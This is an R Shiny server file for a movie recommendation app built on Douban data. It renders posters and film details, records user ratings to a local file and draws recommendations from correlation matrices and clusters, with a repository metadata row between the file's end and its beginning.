h6(actor)
)
})
})
observeEvent(input$save_movie_might2, {
#docu3 <- read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score2))
print(user_rate)
docu2 <<- rbind(docu2, data.frame(score=user_rate, id = movie_might[2]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[3],'poster'])
})
observeEvent(input$movie_select3,{
id = movie_might[3]
output$movie_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might3, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score3))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[3]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[4],'poster'])
})
observeEvent(input$movie_select4,{
id = movie_might[4]
output$movie_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might4, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score4))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[4]))
write.table(docu2, "./data/docu.rdata")
})
output$movie_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==movie_might[5],'poster'])
})
observeEvent(input$movie_select5,{
id = movie_might[5]
output$movie_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_movie_might5, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$movie_might_score5))
docu2 = rbind(docu2, data.frame(score=user_rate, id = movie_might[5]))
write.table(docu2, "./data/docu.rdata")
})
})
###User_might_block
observeEvent(input$side, {
poster_list2=c()
cor_list2 = movie_cor2[id==rownames(movie_cor2),]
user_might = names(cor_list2)[tail(order(cor_list2))][1:5]
output$user_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[1],'poster'])
})
observeEvent(input$user_select1,{
id = user_might[1]
output$user_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might1, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score1))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[1]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[2],'poster'])
})
observeEvent(input$user_select2,{
id = user_might[2]
output$user_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might2, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score2))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[2]))
write.table(docu2, "./data/docu.rdata")
})
observeEvent(input$save_user_might2, {
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score2))
print(user_rate)
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[2]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[3],'poster'])
})
observeEvent(input$user_select3,{
id = user_might[3]
output$user_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might3, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score3))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[3]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[4],'poster'])
})
observeEvent(input$user_select4,{
id = user_might[4]
output$user_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might4, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score4))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[4]))
write.table(docu2, "./data/docu.rdata")
})
output$user_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==user_might[5],'poster'])
})
observeEvent(input$user_select5,{
id = user_might[5]
output$user_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$save_user_might5, {
docu2 = read.table("./data/docu.rdata")
user_rate = as.numeric(gsub('(\\d).+?','\\1',input$user_might_score5))
docu2 = rbind(docu2, data.frame(score=user_rate, id = user_might[5]))
write.table(docu2, "./data/docu.rdata")
})
})
###sever_user_analyse_block
observeEvent(input$side, {
docu3 = docu2[-1,]
test2 = plyr::join(docu3, movie_all, by = "id")
output$hist <- renderPlot({
hist(test2$score)
})
names(test2)[1] = "docu_score"
test3 = select(test2, docu_score, starts_with("type"))
test3 = gather(test3, "type1":"type5",key = "index", value = "type")
test3 = test3[!is.na(test3$type),c(1,3)]
output$table<-renderTable({
as.data.frame(t(tapply(test3$docu_score, test3$type, mean, na.rm = T)))})
table(test3$type)
})
})
observeEvent(input$refresh1,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[1]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster1_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh2,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[2]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster2_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh3,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[3]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster3_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh4,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[4]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster4_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh5,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[5]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster5_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh6,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[6]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster6_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh7,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[7]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster7_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh8,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[8]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster8_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh9,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[9]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster9_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh10,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[10]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster10_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh11,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[11]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster11_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh12,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[12]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster12_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh13,{
docu2 <- read.table("./data/docu.rdata")
id = sample(settle_cluster[[13]],1)
poster = movie_all[movie_all$id==id, 'poster']
output$cluster13_info <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
img(src = poster),
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
observeEvent(input$refresh_cluster,{
id_list = movie_cluster[,sample(1:50,1)]
id_list = rev(id_list)
output$cluster_might1 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[1],'poster'])
})
observeEvent(input$cluster_select1,{
id = id_list[1]
output$cluster_might_info1 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might2 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[2],'poster'])
})
observeEvent(input$cluster_select2,{
id = id_list[2]
output$cluster_might_info2 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might3 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[3],'poster'])
})
observeEvent(input$cluster_select3,{
id = id_list[3]
output$cluster_might_info3 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might4 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[4],'poster'])
})
observeEvent(input$cluster_select4,{
id = id_list[4]
output$cluster_might_info4 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might5 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[5],'poster'])
})
observeEvent(input$cluster_select5,{
id = id_list[5]
output$cluster_might_info5 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
output$cluster_might6 <- renderUI({
tags$img(src = movie_all[movie_all$id==id_list[6],'poster'])
})
observeEvent(input$cluster_select6,{
id = id_list[6]
output$cluster_might_info6 <- renderUI({
type = movie_all[movie_all$id==id, grep('type\\d',names(movie_all))]
type = type[!is.na(type)]
type = paste(type,collapse = "/")
score = movie_all[movie_all$id==id, 'score']
pop = movie_all[movie_all$id==id, 'pop']
rate = paste(score," (",pop,"人评价)",sep = "")
director = movie_all[movie_all$id==id, grep('director\\d',names(movie_all))]
director = director[!is.na(director)]
director = paste(director,collapse = "/")
director = paste("导演:",director)
actor = movie_all[movie_all$id==id, grep('actor\\d',names(movie_all))]
actor = actor[!is.na(actor)]
actor = paste(actor,collapse = "/")
actor = paste("演员",actor)
tags$div(
h3(movie_all[movie_all$id==id, 'English_name']),
h4(movie_all[movie_all$id==id, 'name']),
h4(rate),
h5(type),
h6(director),
h6(actor)
)
})
})
})
}
| /shiny_2/server.R | no_license | BiiHug/bouban_public | R | false | false | 46,122 | r | ###Load library
library(shiny)
library(shinyjs)
library(tidyverse)
library(plyr)
library(data.table)
###Data and environment preparation
movie_all = read.table("./data/movie_all.rdata")
header1 = read.table("./data/movie_cor.rdata", header = TRUE, nrow = 1)
movie_cor = fread("./data/movie_cor.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor, colnames(header1))
colnames(movie_cor) = gsub("X(\\d+)","\\1",colnames(movie_cor))
rownames(movie_cor) = colnames(movie_cor)
header2 = read.table("./data/movie_cor2.rdata", header = TRUE, nrow = 1)
movie_cor2 = fread("./data/movie_cor2.rdata", skip=1, header=FALSE)[,-1]
setnames(movie_cor2, colnames(header2))
colnames(movie_cor2) = gsub("X(\\d+)","\\1",colnames(movie_cor2))
rownames(movie_cor2) = colnames(movie_cor2)
people_all = fread("./data/people_all.csv")
settle_cluster = read_rds("./data/settle_cluster.rdata")
movie_cluster = read.table("./data/movie_cluster.rdata")
docu =data.frame(score=c(1), id = c(1)) ###Initialization the user-docu-vector!!!
write.table(docu,"./data/docu.rdata") ###Initialization the user-docu-vector!!!
create_movies = function(){
docu2 <- read.table("/Applications/学习/UWM/new479/douban_public/douban_public/shiny_2/data/docu.rdata")
docu3 = docu2[-1,]
scored = docu3$score
scored_id = docu3$id
movie_recon <- function(movie_cor){
n = length(movie_cor[,1])
